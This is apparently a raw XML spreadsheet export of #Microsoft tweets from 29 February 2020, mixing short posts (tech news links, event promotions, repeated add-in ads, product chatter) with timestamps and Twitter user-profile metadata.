    <t>{'id': 790885702347218944, 'id_str': '790885702347218944', 'name': 'Stefan Hofer', 'screen_name': 'st_hof', 'location': 'Oslo, Norway.', 'description': 'PostDoc @UniOslo, PhD @BristolUni, Clouds and Greenland climate. \nhttps://t.co/KCWWJBXRYc', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/KCWWJBXRYc', 'expanded_url': 'http://noflyclimatesci.org', 'display_url': 'noflyclimatesci.org', 'indices': [66, 89]}]}}, 'protected': False, 'followers_count': 667, 'friends_count': 1265, 'listed_count': 12, 'created_at': 'Tue Oct 25 12:00:20 +0000 2016', 'favourites_count': 21422, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1752, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/963563862585901056/Q7czz_TG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963563862585901056/Q7czz_TG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/790885702347218944/1477909450',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</si>
  <si>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13:11:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Windows10 new update  Quick take a snip
#Newfeature #Microsoftwindows #Microsoftcontact #Microsoftupdate 24x7 hrs #MicrosoftSupport
Stay Connect- @Mytechsquad
Toll free number (AUSTRALIA)- -1800-517-221 https://t.co/paRBX9mGic</t>
  </si>
  <si>
    <t>Sat Feb 29 13:09:35 +0000 2020</t>
  </si>
  <si>
    <t>Hello!
Less than 2 hours for TechDayConf 2020, don't forget to join us!
Have a nice weekend!
Link: https://t.co/qyn95Ru3j8
Agenda: https://t.co/bvj279K6qE
#mvpbuzz #techdayconf #techdayconf2020 #dotnetcore #aks #csharp #virtualconference #microsoft  #azure</t>
  </si>
  <si>
    <t>{'id': 378633936, 'id_str': '378633936', 'name': 'Rebai Hamida', 'screen_name': 'RebaiHamida', 'location': 'QuÃ©bec, Canada', 'description': 'Microsoft MVP in Developer Technologies, .NET Architect Consultant in CGI, Technical Writer, Blogger, VBlogger, Tech Event Speaker.', 'url': 'https://t.co/yaID3SNFof', 'entities': {'url': {'urls': [{'url': 'https://t.co/yaID3SNFof', 'expanded_url': 'https://medium.com/@didourebai', 'display_url': 'medium.com/@didourebai', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 470, 'friends_count': 1101, 'listed_count': 8, 'created_at': 'Fri Sep 23 14:57:51 +0000 2011', 'favourites_count': 700, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1036718448137646080/PifeSb0d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1036718448137646080/PifeSb0d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/378633936/1536007893',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</si>
  <si>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13:04:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Windows: What you need to know about what's coming next https://t.co/S1jdcFgJRz via @techrepublic #tech</t>
  </si>
  <si>
    <t>Sat Feb 29 13:01:29 +0000 2020</t>
  </si>
  <si>
    <t>AI ethics backed by Pope and tech giants in new plan. https://t.co/7cEOPPxRI1 #ml #ai #ibm #microsoft #machinelearning</t>
  </si>
  <si>
    <t>{'id': 18452761, 'id_str': '18452761', 'name': 'Ãœ sÄ±É¹É¹oÉ¯ Ê‡ÇÇd É¹p', 'screen_name': 'peetm', 'location': 'Oxford, England', 'description': 'Computer Scientist; Lecturer; Academic; Entrepreneur, Angel.  Plus other stuff: Ex Microsoft Software Design Engineer. All things A.I., and Stetson hats!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1547, 'friends_count': 1197, 'listed_count': 13, 'created_at': 'Mon Dec 29 16:28:49 +0000 2008', 'favourites_count': 7751, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19628,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'http://pbs.twimg.com/profile_images/1229452914705473537/weZX7tFz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229452914705473537/weZX7tFz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18452761/1583161223', 'profile_link_color': '4488D4',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'regular'}</t>
  </si>
  <si>
    <t>Sat Feb 29 13:00:43 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #office365     Accelerate your nonprofit's mission and increase your impact. Watch "Increasing productivity with Office 365," a webcast brought to you by @msftnonprofits, to see how your organization can be productive from field to office. https://t.co/oW5XN2yd0m</t>
  </si>
  <si>
    <t>Sat Feb 29 13:00:28 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/vCZ2TE0K6j</t>
  </si>
  <si>
    <t>{'id': 539722403, 'id_str': '539722403', 'name': 'Ogreat Games', 'screen_name': 'OgreatGames', 'location': 'Check Us out!', 'description': 'Enjoy video game updates, cool content, &amp; everything else in this twitter feed of https://t.co/AqlVtAZvtR!', 'url': 'https://t.co/AqlVtAZvtR', 'entities': {'url': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/AqlVtAZvtR', 'expanded_url': 'https://www.ogreatgames.com', 'display_url': 'ogreatgames.com', 'indices': [82, 105]}]}}, 'protected': False, 'followers_count': 13577, 'friends_count': 8695, 'listed_count': 110, 'created_at': 'Thu Mar 29 06:27:06 +0000 2012', 'favourites_count': 95, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 74832,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'http://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2624719093/vujahrx8ltbdjd7c3qjt_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/539722403/1423680953',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</si>
  <si>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12:58:31 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/1Ra8wS2XwS</t>
  </si>
  <si>
    <t>{'id': 3163856761, 'id_str': '3163856761', 'name': 'E2D3\x1d_dataviz on Excel', 'screen_name': 'e2d3org', 'location': 'æ—¥æœ¬', 'description': 'Open Source Data Visualization Platform E2D3! Demo https://t.co/VS0UXxp0sw Web https://t.co/fUF0QSqjfj Github https://t.co/fRHE7rcxVP FB https://t.co/GCdHHPiHRf', 'url': 'http://t.co/fUF0QSqjfj', 'entities': {'url': {'urls': [{'url': 'http://t.co/fUF0QSqjfj', 'expanded_url': 'http://e2d3.org/', 'display_url': 'e2d3.org', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/VS0UXxp0sw', 'expanded_url': 'http://a.e2d3.org/', 'display_url': 'a.e2d3.org', 'indices': [51, 74]}, {'url': 'https://t.co/fUF0QSqjfj', 'expanded_url': 'http://e2d3.org/', 'display_url': 'e2d3.org', 'indices': [79, 102]}, {'url': 'https://t.co/fRHE7rcxVP', 'expanded_url': 'https://github.com/e2d3/', 'display_url': 'github.com/e2d3/', 'indices': [110, 133]}, {'url': 'https://t.co/GCdHHPiHRf', 'expanded_url': 'https://goo.gl/DdZnuh', 'display_url': 'goo.gl/DdZnuh', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 1702, 'friends_count': 4252, 'listed_count': 282, 'created_at': 'Sun Apr 19 11:33:10 +0000 2015', 'favourites_count': 4152, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8979,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'http://pbs.twimg.com/profile_images/589754835395678208/4Iq5fqZr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/589754835395678208/4Iq5fqZr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3163856761/1478182401', 'profile_link_color': '19CF86',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</si>
  <si>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12:52:01 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/uckymUhcfD</t>
  </si>
  <si>
    <t>Sat Feb 29 12:47:47 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/YfrwkFL2nO</t>
  </si>
  <si>
    <t>Sat Feb 29 12:45:36 +0000 2020</t>
  </si>
  <si>
    <t>Absolutely blown away by this offer of generosity from @cr_allen,@BenVollmer. We cannot thank you enough. Every bit counts. Please dig deep. Collection in expo area.
#community #charity #payitforward #scottishsummit #ss2020 #microsoft #communityevent 
https://t.co/UWcbX1MVll</t>
  </si>
  <si>
    <t>{'id': 1118604906183766016, 'id_str': '1118604906183766016', 'name': 'Scottish Summit #SS2020', 'screen_name': 'scottishsummit', 'location': 'Strathclyde University TIC', 'description': 'FREE event from the Microsoft community. Level 100 - 400 tracks in Power Platform, Dynamics 365, Azure, Big Data, O365, SharePoint &amp; Personal Skills', 'url': 'https://t.co/NH7J7YWqj9', 'entities': {'url': {'urls': [{'url': 'https://t.co/NH7J7YWqj9', 'expanded_url': 'https://Scottishsummit.com', 'display_url': 'Scottishsummit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 857, 'friends_count': 2646, 'listed_count': 3, 'created_at': 'Wed Apr 17 19:59:27 +0000 2019', 'favourites_count': 628, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 798, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1190230622167539712/Z-6B6zt9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190230622167539712/Z-6B6zt9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1118604906183766016/1569142633',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</si>
  <si>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12:45:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Publisher 2020 Made Easy Training Tutorial
#microsoft #publisher #training #course
https://t.co/3k3qZJjBuE</t>
  </si>
  <si>
    <t>Sat Feb 29 12:44:13 +0000 2020</t>
  </si>
  <si>
    <t>Simplify your business financials for all your companies in just one database https://t.co/qdwbqjs0J5
#BusinessNews #tech #automation #TheresAnAppForThat #SmallBusinessOwner #Inventory #Database #Management #PowerBI #CRM #Microsoft #PowerPlatform #Service #CloudAccounting #CFO https://t.co/Z96Fn08NUy</t>
  </si>
  <si>
    <t>Sat Feb 29 12:43:24 +0000 2020</t>
  </si>
  <si>
    <t>Picked up our microbit @EssexLibraries today #EssexMicrobitChallenge2020 so cool @Essex_CC #essex2020 #Microsoft free to borrow #lovelibraries https://t.co/O1d0dX7yx8</t>
  </si>
  <si>
    <t>{'id': 48764498, 'id_str': '48764498', 'name': 'Reading Champion', 'screen_name': 'KPlife', 'location': ' Essex', 'description': 'Katharine Pond Reading Champion \nLSA\nPassionate about inspiring a love of books.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 556, 'friends_count': 1850, 'listed_count': 12, 'created_at': 'Fri Jun 19 17:14:15 +0000 2009', 'favourites_count': 762, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3030,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'http://pbs.twimg.com/profile_images/986547733422067712/0wATcVD5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/986547733422067712/0wATcVD5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/48764498/1452801826',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</si>
  <si>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Sat Feb 29 12:42:14 +0000 2020</t>
  </si>
  <si>
    <t>Get 50%discount on MTA exams: https://t.co/TXsapJm50M.....
Call us on 305-671-3666 to schedule an appointment to take the exam.
#certificate #certificateofexcellence #certificates #certificateofcompletion #exam #training #microsoft #test #course @DonardStJean https://t.co/DySYCepJ4C</t>
  </si>
  <si>
    <t>{'id': 627407188, 'id_str': '627407188', 'name': 'DIOT', 'screen_name': 'DadeInstitute', 'location': 'Miami, FL', 'description': 'The best Place for your Computer and Information Technology Training.We have best trainers that will help you get certified in CompTIA,Microsoft,Cisco &amp; Oracle', 'url': 'http://t.co/TXsapJm50M', 'entities': {'url': {'urls': [{'url': 'http://t.co/TXsapJm50M', 'expanded_url': 'http://www.dadeinstituteoftechnology.com', 'display_url': 'dadeinstituteoftechnology.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 781, 'friends_count': 1094, 'listed_count': 1, 'created_at': 'Thu Jul 05 13:53:18 +0000 2012', 'favourites_count': 79, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 432,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'http://pbs.twimg.com/profile_images/668684904058585088/78d48uXM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/668684904058585088/78d48uXM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/627407188/1448263432', 'profile_link_color': 'FF691F',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</si>
  <si>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Sat Feb 29 12:42:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Previews Its Linux Antivirus; Apps For Android, iOS Coming This Year Microsoft has announced in a blog post that its planning to bring the Defender antivirus to more platforms. This includes Mi https://t.co/N0PuLWVkDl
#Antivirus #Microsoft #MicrosoftDefenderATP #News</t>
  </si>
  <si>
    <t>{'id': 3307232403, 'id_str': '3307232403', 'name': 'Mark Cutting', 'screen_name': 'phenomlab', 'location': 'London, England', 'description': 'Infrastructure &amp; Security Expert | Founder of https://t.co/nhanStBoI4| CISO | Guru | Mentor | All views and / or opinions are my own.', 'url': 'https://t.co/nhanStBoI4', 'entities': {'url': {'urls': [{'url': 'https://t.co/nhanStBoI4', 'expanded_url': 'https://phenomlab.com', 'display_url': 'phenomlab.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/nhanStBoI4', 'expanded_url': 'https://phenomlab.com', 'display_url': 'phenomlab.com', 'indices': [46, 69]}]}}, 'protected': False, 'followers_count': 2167, 'friends_count': 643, 'listed_count': 214, 'created_at': 'Wed Jun 03 17:47:50 +0000 2015', 'favourites_count': 1180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10054,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'http://pbs.twimg.com/profile_images/1190661097763852288/L6XL0ZCi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190661097763852288/L6XL0ZCi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3307232403/1574696508',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</si>
  <si>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Sat Feb 29 12:41:59 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Previews Its Linux Antivirus; Apps For Android, iOS Coming This Year Microsoft has announced in a blog post that its planning to bring the Defender antivirus to more platforms. This includes Microsoft D https://t.co/i5rhp1R7n3
#Microsoft #News #Security</t>
  </si>
  <si>
    <t>Sat Feb 29 12:41:26 +0000 2020</t>
  </si>
  <si>
    <t>Brave beats other browsers in privacy study Users looking for a privacy-focused browser might want to consider Brave first, according to a study published this week. https://t.co/UdbnGrCr07
#apple #google #Microsoft #News</t>
  </si>
  <si>
    <t>Sat Feb 29 12:41:23 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with Microsoft spam What a difference one tiny little character can make to a phone number. https://t.co/rrwB5rubbC
#Microsoft #News</t>
  </si>
  <si>
    <t>Sat Feb 29 12:38:10 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/B3xfqDw4by</t>
  </si>
  <si>
    <t>Sat Feb 29 12:37:53 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/muzin2DwCE</t>
  </si>
  <si>
    <t>Sat Feb 29 12:37:38 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/kjazcBWq0t</t>
  </si>
  <si>
    <t>Sat Feb 29 12:37:21 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/SkUjLwF6MJ</t>
  </si>
  <si>
    <t>Sat Feb 29 12:37:05 +0000 2020</t>
  </si>
  <si>
    <t>#E2D3 is an #Excel add-in for #dataviz. Excel to #d3js.#GitHub #data #datavizualization #javascript #json #infographics #startup #map #DataScience #ddj #datascraping #datajournalism #JS #OpenSource #OSS #GIS #Microsoft #vuejs #Nodejs #html5 #tech #edtech #visualization #Nodejs https://t.co/AyiWOqOd3U</t>
  </si>
  <si>
    <t>Sat Feb 29 12:35:37 +0000 2020</t>
  </si>
  <si>
    <t>10 Tech Websites That Geek User Needs To Know!
https://t.co/XTerw44vr9
#google #windows10 #windows #microsoft #browsers #websites #computer #laptop #apple #pc #gamingpc #smartphone #android #gaming  #iphone #oneplus #google #microsoft #gamingsetup #gadgetcreators #vivekkumarvora https://t.co/Tts93Jajpg</t>
  </si>
  <si>
    <t>Sat Feb 29 12:35:02 +0000 2020</t>
  </si>
  <si>
    <t>In the shadow of #Amazon and #Microsoft, Seattle #startups are having a moment  TechCrunch https://t.co/qIWpR4pyQK #TechJunkieNews https://t.co/owEtrzmmm9</t>
  </si>
  <si>
    <t>{'id': 3064266184, 'id_str': '3064266184', 'name': 'Tech Junkie', 'screen_name': 'techjunkiejh', 'location': '', 'description': 'https://t.co/mVXNWwBD1G , promoter of coding. Coding should be fun. How you think is just as important as what you think. News,games,Movies,TV, invest junkie', 'url': 'https://t.co/IAUcQUfG4o', 'entities': {'url': {'urls': [{'url': 'https://t.co/IAUcQUfG4o', 'expanded_url': 'http://www.techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/mVXNWwBD1G', 'expanded_url': 'http://techjunkieblog.com', 'display_url': 'techjunkieblog.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 29059, 'friends_count': 25178, 'listed_count': 6470, 'created_at': 'Fri Feb 27 00:58:22 +0000 2015', 'favourites_count': 14066, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 257180,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'http://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/587160065536299009/9MBFPj6a_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3064266184/1465744133',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</si>
  <si>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12:34:27 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases New Unified Office for iOS, Combining Word, Excel, and Powerpoint in a Single App(via @Pocket) https://t.co/bcX1bVc0HD</t>
  </si>
  <si>
    <t>{'id': 29146048, 'id_str': '29146048', 'name': 'Max', 'screen_name': 'MaxQ8', 'location': 'Kuwait / India', 'description': 'Indian national residing in Kuwait / Father of two / Drummer in a worship team', 'url': 'https://t.co/lsrqUM3iEq', 'entities': {'url': {'urls': [{'url': 'https://t.co/lsrqUM3iEq', 'expanded_url': 'http://maxq8.wordpress.com', 'display_url': 'maxq8.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2634, 'friends_count': 1946, 'listed_count': 138, 'created_at': 'Mon Apr 06 04:48:47 +0000 2009', 'favourites_count': 6099, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 71662,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'http://pbs.twimg.com/profile_images/886888939746988032/2sSHu2nb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/886888939746988032/2sSHu2nb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29146048/1443385292', 'profile_link_color': '545454', 'profile_sidebar_border_color': 'F009F0', 'profile_sidebar_fill_color': '8F8F8F', 'profile_text_color': '3E3E9C', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 12:31:41 +0000 2020</t>
  </si>
  <si>
    <t>@jondcarroll Well life support was supposed to be selling divisions off previously including to the likes of #Microsoft, wasn't?
Where did all that money go?
Didn't that last re-structure supposedly be the way to save them long term?
They need really focus on what they are going to do...</t>
  </si>
  <si>
    <t>{'id': 18986537, 'id_str': '18986537', 'name': 'Ian M Calvert', 'screen_name': 'IanMCalvert', 'location': 'Warwickshire, United Kingdom', 'description': 'Coach * Connector * Educator * Futurist * Influencer * Strategist * Trainer - Here to help you to understand Generation Alpha &amp; Social Business', 'url': 'https://t.co/hAPdwAvjHG', 'entities': {'url': {'urls': [{'url': 'https://t.co/hAPdwAvjHG', 'expanded_url': 'http://buff.ly/1KJzobQ', 'display_url': 'buff.ly/1KJzobQ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28440, 'friends_count': 23168, 'listed_count': 2947, 'created_at': 'Wed Jan 14 17:55:44 +0000 2009', 'favourites_count': 63764, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 177595,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'http://pbs.twimg.com/profile_images/751394275624099840/4Vs2moLb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/751394275624099840/4Vs2moLb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18986537/1371908879', 'profile_link_color': '94D487',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</si>
  <si>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Sat Feb 29 12:30:12 +0000 2020</t>
  </si>
  <si>
    <t>News of the day: Microsoft Upgrades Edge Browser to protect against Malware and Crypto Miners
https://t.co/sepI9fBDsm
#Microsoft #Cryptonews #cryptoworld #malware #upgrade #cryptocurrency #Browser #cryptosoftware #miners #mining #breakingnews #cryptomining #coinscapture https://t.co/AaP9aHlwGd</t>
  </si>
  <si>
    <t>{'id': 1069887133815578624, 'id_str': '1069887133815578624', 'name': 'Coins Capture', 'screen_name': 'coins_capture', 'location': '', 'description': 'Found in 2018, https://t.co/xfZkSvNBG1  the best, real-time, high-quality crypto-currency market data provider by listing 2000+ cryptocurrency globally.', 'url': 'https://t.co/JtigyIZ7bG', 'entities': {'url': {'urls': [{'url': 'https://t.co/JtigyIZ7bG', 'expanded_url': 'http://coinscapture.com/', 'display_url': 'coinscapture.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/xfZkSvNBG1', 'expanded_url': 'http://Coinscapture.com', 'display_url': 'Coinscapture.com', 'indices': [15, 38]}]}}, 'protected': False, 'followers_count': 898, 'friends_count': 1803, 'listed_count': 3, 'created_at': 'Tue Dec 04 09:32:25 +0000 2018', 'favourites_count': 1900, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 748, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1090554738184257536/cuoTaITl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090554738184257536/cuoTaITl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1069887133815578624/1548845698',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</si>
  <si>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12:18:35 +0000 2020</t>
  </si>
  <si>
    <t>The new Xbox-6S, now in rose gold
#Microsoft #XboxSeriesX #rosegold https://t.co/rd0CWDWZJQ</t>
  </si>
  <si>
    <t>{'id': 1041508161373392896, 'id_str': '1041508161373392896', 'name': 'Nerd Shanty', 'screen_name': 'NerdShanty', 'location': 'Orlando, FL', 'description': 'Nerd Shanty is a group founded to not only bring nerd content to people but make it a social, accessible experience.', 'url': 'https://t.co/EaUrxue5DH', 'entities': {'url': {'urls': [{'url': 'https://t.co/EaUrxue5DH', 'expanded_url': 'https://www.facebook.com/groups/nerdshanty/', 'display_url': 'facebook.com/groups/nerdshaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 53, 'listed_count': 1, 'created_at': 'Mon Sep 17 02:04:30 +0000 2018', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 693, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1116882185821327360/kDzBub49_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116882185821327360/kDzBub49_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1041508161373392896/1564351082',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</si>
  <si>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12:16:12 +0000 2020</t>
  </si>
  <si>
    <t>Hamilton_Barnes:  Microsoft antivirus software for Android, iOS a reflection of the times #hamiltonbarnes #ios #microsoft #Android https://t.co/DUnmbpb3yk https://t.co/pynMQwz81P</t>
  </si>
  <si>
    <t>{'id': 791527525, 'id_str': '791527525', 'name': 'James Dean', 'screen_name': 'JamesDeanRec', 'location': 'London', 'description': 'Head of the IP Division at @Hamilton_Barnes focusing on the IP Networking space across Europe!  Check out my blog - https://t.co/sTaZpAPhH8', 'url': 'http://t.co/9umCLD77ER', 'entities': {'url': {'urls': [{'url': 'http://t.co/9umCLD77ER', 'expanded_url': 'http://www.linkedin.com/in/jamesdeancisco', 'display_url': 'linkedin.com/in/jamesdeanciâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/sTaZpAPhH8', 'expanded_url': 'http://www.jamesdean862.wordpress.com', 'display_url': 'jamesdean862.wordpress.com', 'indices': [116, 139]}]}}, 'protected': False, 'followers_count': 2689, 'friends_count': 4834, 'listed_count': 533, 'created_at': 'Thu Aug 30 12:46:15 +0000 2012', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 35502,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'http://pbs.twimg.com/profile_images/1021668259458736129/nFZwp6Ht_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021668259458736129/nFZwp6Ht_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/791527525/1435936262',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</si>
  <si>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12:15:19 +0000 2020</t>
  </si>
  <si>
    <t>Amazing @JanetHesterRobb  from #Microsoft telling us how most business solutions failures aren't due to technology issues. If only more people were like Janet, what a place the world would be.. 
#SS2020 #scottishsummit https://t.co/t0UYkaqXLj</t>
  </si>
  <si>
    <t>Sat Feb 29 12:14:45 +0000 2020</t>
  </si>
  <si>
    <t>#ArtificialIntelligence still can't figure out that
a single #GoogleSearch about a Hawaiian shirt doesn't mean I'm buying it
and 1000s of #TargetedAds for 3 months won't make me buy.
Me: "Cool shirt! Maybe? Nah."
#Google, #Microsoft: "Vomit shirt all over websites forever!"</t>
  </si>
  <si>
    <t>{'id': 324541569, 'id_str': '324541569', 'name': 'Kleo', 'screen_name': 'KLeoPullin', 'location': 'Washington, DC', 'description': 'Electron Microscopist ðŸ”¬ (Materials, Geo, Bio), Technician, Artist ðŸŽž, ðŸŽ¨ | she/her', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 606, 'listed_count': 0, 'created_at': 'Sun Jun 26 20:16:23 +0000 2011', 'favourites_count': 6333, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2455,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'http://pbs.twimg.com/profile_images/611300028552843265/c170okqk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/611300028552843265/c170okqk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/324541569/1438467744', 'profile_link_color': '4A913C',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</si>
  <si>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12:12:00 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus jolts tech firms: #Facebook cancels #F8 conference; #Microsoft #Apple warn
The global tech industry is being rattled by the virus.
https://t.co/kowWA92Uzd</t>
  </si>
  <si>
